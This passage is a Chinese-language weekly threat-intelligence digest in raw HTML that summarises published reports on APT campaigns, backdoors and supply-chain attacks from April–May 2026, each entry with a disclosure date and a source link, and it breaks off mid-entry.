10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034960" src="https://wechat2rss.xlab.app/img-proxy/?k=0be014fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicyD8ey8lX6sd2FyJS4agOl3YUsOhiaa0MFrE33ykib9bGBFhmcIQTzY4LnsAYbwk6tNC0ZqkQibwsz6NPABGx7QUaVN5IQv6Opn0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034961" src="https://wechat2rss.xlab.app/img-proxy/?k=7b2ad9d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibff9xkqmuQ9lkfdkVDke7HwpdIibjJC7ScwEDctwHYtoH5Rhrj1vU8X8AHt45KWaNx1XbICFMicCpfYUbpUm86uU2cyCZW87MFM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月30日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securelist.com/silver-fox-tax-notification-campaign/119575/" target="_blank">https://securelist.com/silver-fox-tax-notification-campaign/119575/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Silver Fox威胁组织通过伪装成印度和俄罗斯税务通知的钓鱼邮件，利用修改版RustSL加载器投放ValleyRAT后门，进而部署此前未公开的Python后门ABCDoor。ABCDoor基于Socket.IO通信，具备屏幕广播、文件管理、远程控制、持久化等能力，其C2域名常含abc前缀，自2024年底起持续演化，主要针对工业、咨询、零售等行业组织。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034963" data-ratio="0.6" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0e590219&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqib5ZKKAZf0ibfKib9LMSjGVhtAqwHibOeRxTtEIfpvBUs4oDibgHjooUJVnGduW6JMt1WbMzZJZYvSKjJojOoXYyyPULV5aWbvnINo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">ScarCruft 通过供应链攻击破坏游戏平台</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.welivesecurity.com/en/eset-research/rigged-game-scarcruft-compromises-gaming-platform-supply-chain-attack/" target="_blank">https://www.welivesecurity.com/en/eset-research/rigged-game-scarcruft-compromises-gaming-platform-supply-chain-attack/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APT组织ScarCruft通过入侵中国延边地区的游戏平台sqgame，在Windows客户端更新包和安卓游戏安装包中植入恶意代码，传播Windows版RokRAT后门及新发现的Android版BirdCall后门，该后门支持收集联系人、短信、文件、屏幕截图和录音等间谍功能，主要针对延边朝鲜族人群及脱北者。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月6日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securelist.com/oceanlotus-suspected-pypi-zichatbot-campaign/119603/" target="_blank">https://securelist.com/oceanlotus-suspected-pypi-zichatbot-campaign/119603/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">海莲花组织疑似通过PyPI上传恶意wheel包，伪装成uuid32-utils、colorinal等正常库，依赖安装后释放DLL或SO格式的释放器，进而部署新型后门ZiChatBot。该后门利用Zulip聊天应用的REST API作为命令与控制服务器，接收并执行shellcode，同时通过注册表或计划任务实现持久化，以发起供应链攻击。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">研究发现 MuddyWater 与一起Chaos勒索软件攻击有关</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月6日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/" target="_blank">https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APT组织MuddyWater伪装成Chaos勒索软件，通过Microsoft Teams进行社交工程和屏幕共享，诱导用户输入凭证并操纵多因素认证，随后利用DWAgent等远程管理工具建立持久化访问，并部署名为Game.exe的自定义后门，在未实际加密文件的情况下窃取数据并实施勒索，所使用的代码签名证书等证据表明这是一起国家支持的网络间谍活动。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034955" data-ratio="0.7680851063829788" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="940" src="https://wechat2rss.xlab.app/img-proxy/?k=5214a381&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqib87GicVHjpzwibyicW2AzJh2x2kp3mrF3yvg16scnTYKZwVFsJNIXvqRIFdqcBEvtnn437CcFVSwS5lK65ZyKPDY3WXKXGNgsqEM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034952" src="https://wechat2rss.xlab.app/img-proxy/?k=b23014c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9U2wfd8uwLjqCOVwguaOZakeXewFN3IH1EKtNhXrpRZfpm4lHEYJJ780jXTITFDQSvqibVdUbStP14iaJkfonmPzvbcEiaic25biag%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034954" src="https://wechat2rss.xlab.app/img-proxy/?k=2754b8a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibn8eRcbjbDTy3fmVeuDIXSU2nBWeILgBico3Vz5lBgiaHJznOCantTqNiaxyibTzoNMkq8d4AiaMrsfVuqLtHAY3eL0jEvrjM1ZuHk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034953" src="https://wechat2rss.xlab.app/img-proxy/?k=26eeb0ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8ELv7cicLYVRqHZdpuoEHbmMbZ5vxNWqlAibnZ0Qzvv30MTbhhVaF5vcBXmDIFiaeXDOzHUDy1WuEoythiblFELGjpBVdOxPLh8c8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034951" src="https://wechat2rss.xlab.app/img-proxy/?k=246050a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibHibAfvDCme83ia5QgUEUudCBV2YxvJjKaTibgPMsKJFb8frpnL1aOBhSiaG0fMr3SVb8BZlqtpJvwgVviaW3BpG5F4mupibg7X74Fk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Operation Silent Rotor 在莫斯科峰会前夕针对无人机行业进行攻击</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月6日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.seqrite.com/blog/operation-silent-rotor-rust-malware-unmanned-aviation-sector/" target="_blank">https://www.seqrite.com/blog/operation-silent-rotor-rust-malware-unmanned-aviation-sector/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员披露名为&#34;Operation Silent Rotor&#34;的攻击活动，攻击者通过钓鱼邮件发送名为cai partner.zip的压缩包，内含Rust编写的恶意可执行文件及多个诱饵文档，诱使目标执行后展示伪装成订单确认的俄语文档，同时收集主机名、IP地址等系统信息并加密发送至C2服务器，随后下载并执行第二阶段载荷，该活动瞄准欧亚无人航空领域，时间上对应莫斯科无人航空论坛。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">东南亚军事实体成为 cPanel(CVE-2026-41940) 攻击目标</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月2日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://ctrlaltintel.com/research/SEA-CPanel/" target="_blank">https://ctrlaltintel.com/research/SEA-CPanel/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用cPanel认证绕过漏洞CVE-2026-41940，针对菲律宾、老挝等东南亚国家的政府与军事机构以及托管服务提供商进行交互式入侵。攻击者使用公开漏洞利用代码，同时针对印度尼西亚国防培训门户开发了自定义SQL注入至RCE的链式攻击。通过OpenVPN和Ligolo建立持久化隧道后，攻击者成功窃取了中国铁路学会电气化委员会约4.37GB的敏感文件，包含铁路技术资料及人员身份与银行信息，C2采用AdaptixC2。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意 Intercom PHP 包通过 Composer 插件向 Packagist 传播</span><span leaf="">Mini</span><span leaf=""> Shai-Hulud 攻击</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月30日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://semgrep.dev/blog/2026/malicious-intercom-php-package-spreads-mini-shai-hulud-attack-to-packagist-via-composer-plugin/" target="_blank">https://semgrep.dev/blog/2026/malicious-intercom-php-package-spreads-mini-shai-hulud-attack-to-packagist-via-composer-plugin/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span 